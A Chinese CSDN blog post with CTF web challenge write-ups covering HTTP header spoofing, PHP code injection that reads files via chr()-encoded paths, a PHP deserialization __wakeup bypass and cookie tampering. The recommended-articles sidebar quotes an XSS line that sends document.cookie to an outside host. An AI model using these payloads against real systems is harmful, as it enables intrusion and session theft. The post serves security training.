1web wp

最新推荐文章于 2024-06-13 01:44:59 发布
最新推荐文章于 2024-06-13 01:44:59 发布
阅读量54 收藏
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TMNOA/article/details/129725508
版权

[极客大挑战 2019]Http

  1. 打开burpsuite 对网址抓包,并利用重发器查看源代码
  2. 找到了a标签,跳转地点为Secret.php
  3. 修改http头 GET后面加上/Secret.php
  4. 回显结果如图

 

5.修改http头 加上Referer:https://Sycsecret.buuoj.cn

6.修改http头 根据上步回显修改浏览器为Syclover

回显为No!!! you can only read this locally!!!

7.http头中添加X-Forwarded-For:127.0.0.1  后得到flag

[RoarCTF 2019]Easy Calc

  1. 输入1’和1”均无报错
  2. 打开源码,进入提到的calc.php界面
  3. 构造函数/calc.php? num=2;var_dump(scandir(chr(47)))   发现f1agg
  4. calc.php? %20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

[极客大挑战 2019]PHP

  1. 扫描网址,下载www.zip
  2. 观察发现,当username为admin,password为100时,能得到flag
  3. 序列化一个对象O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}因为变量均为私有,加%00.当析构函数销毁该对象时,就能得到flag了
  4. 参数改为3,绕过wakeup()                             ?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;},得flag

[ACTF2020 新生赛]BackupFile

  1. 扫描目录,找到了bak,常用备份文件后缀名。下载后得源码

      2.查看后,传入key=123,即得flag

[极客大挑战 2019]BuyFlag

  1. 打开菜单中的pay flag,查看源代码
  2. 抓包后,因不是学生,试着修改cookie,user改为1,成功
  3. 然后改为post,弱比较,所以password为123xx
  4. money太长太短都不行,直接科学计数法10e9  得flag

TLMOA
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
CtfHub-wpweb
01-23
ctfhub平台webwp
CTF-WEB——HTTP Headers类型
qq_45521281的博客
04-26 6792
基本套路 此类题型就是套路: burpsuite抓包,重放,并根据题目要求多次重放,最终满足全部要求后获得flag。 Header请求参数详解 Header 解释 示例 Accept 指定客户端能够接收的内容类型 Accept: text/plain, text/html,application/json Accept-Charset 浏览器可以接受的字符编码集。 Accep...
2023ISCC web wp
akxnxbshai的博客
06-13 2030
2023ISCC web wp
xctf web wp
qq_63267612的博客
02-11 2131
simple_php 最简单的php,根据题目,get a和b的值如果a和0比较返回为true,而且a为真而且b不是纯数字,而且b要大于1234满足这些条件则返回flag 所以在网页后面加上代码?a=0a&b=a4567得到flag disabled_button 题目是一个不能按的按钮,那把它变成能按的就行,下载下来然后用文本打开,删除disabled,然后再用浏览器打开就能按了,可以得到flag get_post 题目第一步就直接在网页后面赋值就行,然后题目要求请再以POST方式随便提交一个
[SWPU2019]Web1wp
m0_55185160的博客
04-17 2665
我们用sql的惯用姿势1’ or 1=1#去试显示登录失败,也不是get方式传参,还有下面的注册,觉得这里不存在sql注入,注册后发现用户名叫admin已经被注册过了,也发现这里应该不存在注入,随便注册一个账号,登录看这个网站有什么功能。 发现可能在广告申请处有可能存在sql注入, 这里存在waf,于是fuzz测试一下,但是在测试时发现广告申请条数存在限制,必须要清空广告申请列表才可以写下一个申请,所以只能手动测试 我们发现有or # and --+被过滤了 我们发现..
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4046
BUUCTF--Web篇详细wp
VNCTF2022 web wp
热门推荐
Je3Z的博客
02-13 1万+
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 是个xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把ses
GDOUCTF2023-web-wp
adorkablezhenbai的博客
04-16 805
今天和别人交流了一下,发现自己还有很长的路要走。
敏感文件 信息搜集 1-web-wp-1
weixin_52873955的博客
01-06 2000
访问ip:80
CTFshow web1~8 WP Write by SunnyDog
qq_53099119的博客
10-12 1739
2、得到回显后,直接使用union联合注入,找到页面回显点,由于此处不知都为啥我的Hackbar使用出现问题,使用burp来发送数据包,在burp内将数据包发送到Repeater模块,然后传入攻击语句,即可在Response中的渲染内,看到出现回显点。本题与web3的第二种方法做法相同,在user-agent后写一句话木马,包含日志文件后即可通过蚁剑连接。本题开启后,随意点击一个文章,可以发现url地址中有一个参数id,猜测有SQL注入点。蚁剑链接后,就可以在ctf_go_go_go中得到flag。
xctf webWP
weixin_64286326的博客
01-23 2394
1 cookie 在浏览器打开场景后F12 这里很明显提示地址了,我们在地址栏加上cookie.php 根据提示找到flag 2 disabled_button 打开场景 不能按,试了试确实不能按哈哈,很简单,查看源码 将disable删除就行,按一下就得到flag 3.weak_auth 我们试着登入试试 将用户名换成admin 我第一次试的密码就是123456,结果直接出现flag了,哈哈我。不过为了学习我们还要重新试一下 要用...
wpWeb服务编程案例
04-03
wpWeb服务编程案例源码,移动设备现在紧密的跟互联网结合,开发者应该利用这个优势来开发各种网络服务,今天我们介绍在 Windows Phone 上开发 Web 服务应用。
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
web-product-dark_WordPress_wp_
10-03
Web product theme for RevoSlider
网络安全(补充)
m0_62207482的博客
06-11 1020
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全扫盲篇名词解释之“挖矿“
weixin_39266374的博客
06-11 1039
挖矿、比特币、区块链
网络安全练气篇——OWASP TOP 10
最新发布
weixin_55762309的博客
06-13 839
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
w3wp.exe 8288
09-06
在 IIS 上运行的每个 Web 应用程序都会被分配一个独立的 w3wp.exe 进程,该进程负责处理该应用程序的所有请求和响应。 w3wp.exe 进程在运行时会占用一定的系统资源,如内存、CPU 和网络带宽等。因此,当 w3wp.exe ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值